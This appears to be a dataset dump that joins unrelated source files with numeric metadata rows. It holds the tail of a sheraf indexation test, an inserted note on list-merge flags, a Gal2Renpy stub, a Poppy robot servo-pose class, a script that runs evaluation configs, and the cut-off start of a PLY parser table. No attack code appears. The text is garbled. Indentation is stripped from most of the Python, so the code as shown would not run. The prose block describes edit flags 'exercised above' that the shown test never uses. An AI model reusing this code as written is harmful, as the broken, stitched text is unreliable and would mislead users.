"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_generic_indexation(sheraf_database, attribute, list_type):
class AModel(sheraf.Model):
table = "amodel"
name = sheraf.SimpleAttribute()
class BModel(sheraf.Model):
table = "bmodel"
name = sheraf.SimpleAttribute()
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute((AModel, BModel))).index()
with sheraf.connection(commit=True):
a = AModel.create()
m = Model.create(models=[a])
assert m in Model.search(models=a)
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a]
b = BModel.create()
m.models = [a, b]
assert m in Model.search(models=a)
assert m in Model.search(models=b)
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a, b]
assert m in Model.search(models=a)
assert m in Model.search(models=b)
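The `edit(..., edition=..., addition=..., deletion=...)` flags exercised above control how an incoming list is merged into the stored one. A standalone sketch of those semantics for plain lists (an interpretation of the behavior these tests assert, not sheraf's implementation; `replacement`, which recreates the objects, is not modeled):

```python
def merge_lists(old, new, addition=True, deletion=True, edition=True):
    """Merge an incoming list into a stored one under sheraf-style edit flags."""
    common = min(len(old), len(new))
    # positions present on both sides: overwrite only when edition is on
    merged = [new[i] if edition else old[i] for i in range(common)]
    if len(new) > len(old) and addition:       # extra incoming items
        merged.extend(new[common:])
    if len(new) < len(old) and not deletion:   # keep trailing stored items
        merged.extend(old[common:])
    return merged


assert merge_lists(["c", "c"], ["a", "b"]) == ["a", "b"]                 # edition
assert merge_lists(["c", "c"], ["a", "b"], edition=False) == ["c", "c"]  # no edition
assert merge_lists(["a"], ["a", "b"], addition=False) == ["a"]           # no addition
assert merge_lists(["a"], [], deletion=False) == ["a"]                   # no deletion
assert merge_lists(["a"], [], deletion=True) == []                       # deletion
```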

# Source: Gal2Renpy/TagSource/ChTag.py (dtysky/Gal2Renpy, MIT)
#coding:utf-8
#################################
#Copyright(c) 2014 dtysky
#################################
import G2R
class ChTag(G2R.TagSource):
    pass

# Source: src/poppy_servo_control.py (chenson399/poppy-sdk, MIT)
"""
Author: Sydney Awid
Used to control the robot servos
"""
import pypot.dynamixel
import time
class poppy_body_gesture():
def __init__(self):
super().__init__()
self.dxl_io = pypot.dynamixel.DxlIO('COM3')
self.emotion = ''
self.servo_ids = {'torso_base': 33, 'chest_tilt_left_right': 34, 'chest_tilt_forward_backward': 35,
'neck_left_right': 68, 'neck_up_down': 69, 'left_inner_shoulder': 41,
'left_outer_shoulder': 42, 'left_bicep': 43, 'left_elbow': 44, 'right_inner_shoulder': 51,
'right_outer_shoulder': 52, 'right_bicep': 53, 'right_elbow': 54}
        self.keys = list(self.servo_ids)
self.position_list = []
def scan_all_servo_limit(self):
""" Method: poppy_scan_position_limit
servo I.D's are set
scans every dynamixel servo and prints out the servo I.D and corresponding
angle limit.
"""
        with self.dxl_io as io_connect:
            ids = io_connect.scan(list(self.servo_ids.values()))
            id_angle_limit = io_connect.get_angle_limit(ids)
            names = list(self.servo_ids)
            for i in range(len(ids)):
                print(f'{names[i]}: Angle Limit = {id_angle_limit[i]}')
def move_servo(self, servo_id, servo_position, servo_speed):
"""
Control single servo motor with speed and position
:param servo_id: id number of servo or use self.servo_ids and index using keys
:param servo_position: position in degrees
:param servo_speed: speed at which servo moves; 0-250
:return: nothing
"""
self.dxl_io.set_moving_speed({servo_id: servo_speed})
self.dxl_io.set_goal_position({servo_id: servo_position})
def get_servo_position(self, servo_id):
"""
Get position of one servo using its servo id
:param servo_id:id number of servo or use self.servo_ids and index using keys
:return: current position of servo in degrees, value used only on python
"""
return self.dxl_io.get_present_position((servo_id,))[0]
def get_all_servo_position(self, print_list):
"""
Scan and get all current servo positions and print
:param print_list: True = print or False = don't print;
:return: a list of all current positions
"""
        self.position_list = []  # reset so repeated calls do not accumulate stale readings
        for keys in self.servo_ids:
            servo_position = self.get_servo_position(self.servo_ids[keys])
            self.position_list.append(servo_position)
if print_list:
print(f"{keys}: Position = {servo_position}")
return self.position_list
def pose_generator(self):
"""
Use to create new body functions by getting current positions and printing out exact code to use
to put in new function for new body gesture.
PROPER USAGE: Put robot in desired pose then call this function
:return: Nothing
"""
self.position_list = self.get_all_servo_position(False)
        keys = list(self.servo_ids)
print('use the following lines of code for new position')
print('servo_speed = 100')
for i in range(len(self.position_list)):
print(f"self.move_servo(self.servo_ids['{keys[i]}'],{self.position_list[i]}, servo_speed)")
def set_to_idle_position(self):
"""
        Set the robot's pose to idle
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.22, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.24, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.31, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 12.26, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 59.82, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -0.13, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.34, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 0.04, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -86.46, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 0.57, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -74.68, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -0.4, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 83.03, servo_speed)
def set_to_T_position(self):
"""
        Set the robot's body pose to the T position. Also use this when re-assembling the robot.
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 0, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 12.26, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 59.82, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], 0, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], 0, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 0, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 0, servo_speed)
def set_to_happy(self):
"""
        Set the robot's body pose to happy
:return: Nothing
"""
servo_speed = 100
self.set_to_idle_position()
time.sleep(1)
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.5)
for _ in range(3):
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_face_tracking(self):
"""
        Set the robot's pose for face tracking; the neck servos are left untouched
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
def set_to_neutral(self):
"""
        Set the robot's pose to neutral
:return: Nothing
"""
self.emotion = 'neutral'
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 11.65, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.26, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
def set_to_sad(self):
"""
        Set the robot's pose to sad
:return: Nothing
"""
self.emotion = 'sad'
servo_speed = 25
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -11.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], -0.04, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 8.75, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 30.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -13.05, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.87, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 19.47, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -19.82, 100)
self.move_servo(self.servo_ids['right_inner_shoulder'], 9.19, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -83.38, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -8.48, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 20.44, 100)
def set_to_frightened(self):
"""
        Set the robot's pose to frightened
:return: Nothing
"""
self.emotion = 'frightened'
servo_speed = 150
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 21.58, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.84, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 35.03, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 64.66, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 78.29, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -96.75, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -40.4, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 99.21, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -47.87, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 66.24, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 44.0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -114.59, servo_speed)
time.sleep(2)
# reset arms
servo_speed = 100
self.move_servo(self.servo_ids['left_inner_shoulder'], -3.03, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.16, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -25.98, servo_speed)
servo_speed = 75
self.move_servo(self.servo_ids['torso_base'], 0.31, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 2.95, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.48, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 11.65, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.26, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 2.59, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -82.77, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.3, servo_speed)
    def set_to_wave_one_hand(self, right_hand, left_hand):
        """
        Wave with one or both arms, then return to the neutral pose.
        :param right_hand: True to wave the right arm
        :param left_hand: True to wave the left arm
        :return: Nothing
        """
        servo_speed = 100
if left_hand:
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
if right_hand:
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(1)
for _ in range(3):
if right_hand:
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
if left_hand:
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_confused(self):
"""
        Set the robot's pose to confused
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 9.89, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], -8.92, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 71.87, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -19.3, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -137.63, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.57, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 139.82, servo_speed)
servo_speed = 25
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(2)
# shrug shoulders
servo_speed = 50
self.move_servo(self.servo_ids['right_inner_shoulder'], 27.21, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -92.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -41.01, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 76.0, servo_speed)
time.sleep(0.25)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(0.5)
self.set_to_neutral()
def set_to_angry(self):
"""
        Set the robot's pose to angry
:return: Nothing
"""
self.emotion = 'angry'
servo_speed = 125
self.move_servo(self.servo_ids['torso_base'], 0.22, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -2.33, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.75, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 22.81, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 51.91, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -7.6, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 22.2, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 82.33, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 14.55, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -24.04, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -93.58, servo_speed)
time.sleep(0.25)
servo_speed = 150
self.move_servo(self.servo_ids['right_elbow'], 101.58, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -101.49, servo_speed)
time.sleep(3)
# reset arms
servo_speed = 150
self.move_servo(self.servo_ids['right_bicep'], -1.63, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.45, servo_speed)
time.sleep(0.25)
self.set_to_neutral()
def set_to_sad_2(self):
"""
        A second variation of the sad pose; use it to vary the robot's posture while sad.
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -11.91, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 0.13, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 9.19, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 58.77, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -13.14, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 79.69, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 19.21, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -20.09, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 9.19, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -83.3, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -8.31, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 19.91, servo_speed)
def set_to_angry_2(self):
"""
        A second variation of the angry pose; use it to vary the robot's posture while angry.
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.4, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], -1.8, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 1.45, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 9.71, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 60.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -7.6, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 23.34, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 82.07, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -101.14, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 4.26, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -76.18, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -42.07, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 15.34, servo_speed)
def set_to_frightened_2(self):
"""
        A second variation of the frightened pose; use it to vary the robot's posture while frightened.
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 23.43, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 1.54, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 15.78, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 49.98, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -22.99, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 89.27, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 28.0, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -125.76, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 31.34, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -107.03, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -66.42, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 116.62, servo_speed)
def set_to_confused_2(self):
"""
        A second variation of the confused pose; use it to vary the robot's posture while confused.
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.75, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.82, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 10.77, servo_speed)
self.move_servo(self.servo_ids['neck_left_right'], 7.34, servo_speed)
self.move_servo(self.servo_ids['neck_up_down'], 68.62, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -8.66, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 72.92, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -27.82, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -17.27, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.34, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.29, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.31, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 122.68, servo_speed)
def set_to_happy_no_neck(self):
"""
        Set the robot's body pose to happy without moving the neck servos
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['left_inner_shoulder'], -93.58, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 33.54, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], 1.89, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 89.36, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -23.87, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], -2.15, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(1)
for _ in range(3):
self.move_servo(self.servo_ids['left_elbow'], -110.02, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 114.86, servo_speed)
time.sleep(.25)
self.move_servo(self.servo_ids['left_elbow'], -66.77, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 65.8, servo_speed)
time.sleep(.25)
self.set_to_neutral()
def set_to_confused_no_neck(self):
"""
        Set the robot's pose to confused without moving the neck servos
:return: Nothing
"""
servo_speed = 100
self.move_servo(self.servo_ids['torso_base'], 0.48, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_left_right'], 3.21, servo_speed)
self.move_servo(self.servo_ids['chest_tilt_forward_backward'], 9.89, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_bicep'], -19.3, servo_speed)
self.move_servo(self.servo_ids['left_elbow'], -137.63, servo_speed)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['right_bicep'], 40.57, servo_speed)
self.move_servo(self.servo_ids['right_elbow'], 139.82, servo_speed)
servo_speed = 25
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(2)
# shrug shoulders
servo_speed = 50
self.move_servo(self.servo_ids['right_inner_shoulder'], 27.21, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -92.7, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -41.01, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 76.0, servo_speed)
time.sleep(0.25)
self.move_servo(self.servo_ids['right_inner_shoulder'], 15.96, servo_speed)
self.move_servo(self.servo_ids['right_outer_shoulder'], -102.2, servo_speed)
self.move_servo(self.servo_ids['left_inner_shoulder'], -30.64, servo_speed)
self.move_servo(self.servo_ids['left_outer_shoulder'], 93.05, servo_speed)
time.sleep(0.5)
self.set_to_neutral()
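Each `set_to_*` method above repeats the same `self.move_servo(self.servo_ids[name], position, speed)` call for every joint. As a design note, those blocks can also be driven from plain data. The sketch below is illustrative, not part of the original module: the `apply_pose` helper and the `IDLE_POSE` dict are assumptions, and only the `servo_ids` mapping and the `move_servo(servo_id, position, speed)` signature are taken from the class above.

```python
def apply_pose(robot, pose, servo_speed=100):
    """Drive each servo named in `pose` to its target angle.

    `robot` is expected to expose the same `servo_ids` dict and
    `move_servo(servo_id, position, speed)` method as poppy_body_gesture.
    """
    for name, position in pose.items():
        robot.move_servo(robot.servo_ids[name], position, servo_speed)

# A pose then becomes data that can be stored, logged, or tweaked in one place
# (the three values below are copied from set_to_idle_position for illustration):
IDLE_POSE = {'torso_base': 0.22, 'neck_up_down': 59.82, 'left_elbow': -86.46}
```

With a helper like this, `apply_pose(robot, IDLE_POSE)` would replace the corresponding run of `move_servo` lines, and each emotion pose shrinks to one dictionary.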
| 51.868263 | 116 | 0.674286 | 3,896 | 25,986 | 4.166068 | 0.067248 | 0.159571 | 0.178178 | 0.259503 | 0.85694 | 0.83131 | 0.824164 | 0.82096 | 0.81369 | 0.808638 | 0 | 0.047656 | 0.198953 | 25,986 | 500 | 117 | 51.972 | 0.732081 | 0.078889 | 0 | 0.532578 | 0 | 0 | 0.177157 | 0.033925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062323 | false | 0 | 0.005666 | 0 | 0.076487 | 0.01983 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ff14973d88ee2ce4af77dcbf5c5c76140f75d83 | 500 | py | Python | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_Flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_0_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_1_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_2_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_3_Flip.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_4_Flip.yml",
]
for l in ls:
os.system(l) | 45.454545 | 94 | 0.834 | 80 | 500 | 4.8375 | 0.3 | 0.129199 | 0.155039 | 0.245478 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0.899225 | 0 | 0.053305 | 0.062 | 500 | 11 | 95 | 45.454545 | 0.771855 | 0 | 0 | 0 | 0 | 0 | 0.868263 | 0.618762 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
b7837f2d3939b6cbc0969176905abe757991a08d | 14,402 | py | Python | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | null | null | null | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | 15 | 2020-09-05T02:44:15.000Z | 2022-03-02T04:32:48.000Z | Arquitectura de computadores I/Proyecto 1/compiler/Compilador/parsetab.py | Arturok/TEC | 9abe113afb98d1c6ea22c73d979ade928596072c | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.0'
_lr_method = 'LALR'
_lr_signature = 3000528864
_lr_action_items = {'ID':([0,3,6,21,22,37,52,53,57,58,59,60,61,103,104,106,107,120,121,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[5,5,-5,52,53,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,138,139,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'NOP':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[6,6,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'ADD':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[7,7,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7,-8,-9,-10,-13,-15,-16,-24,-11,-12,-14,-17,-18,-19,-32,-33,-34,]),'AND':([0,3,6,37,52,53,57,58,59,60,61,103,104,106,107,129,130,131,132,133,136,138,139,143,147,148,149,150,151,152,153,154,155,],[8,8,-5,-4,-20,-21,-25,-26,-27,-28,-29,-22,-23,-30,-31,-6,-7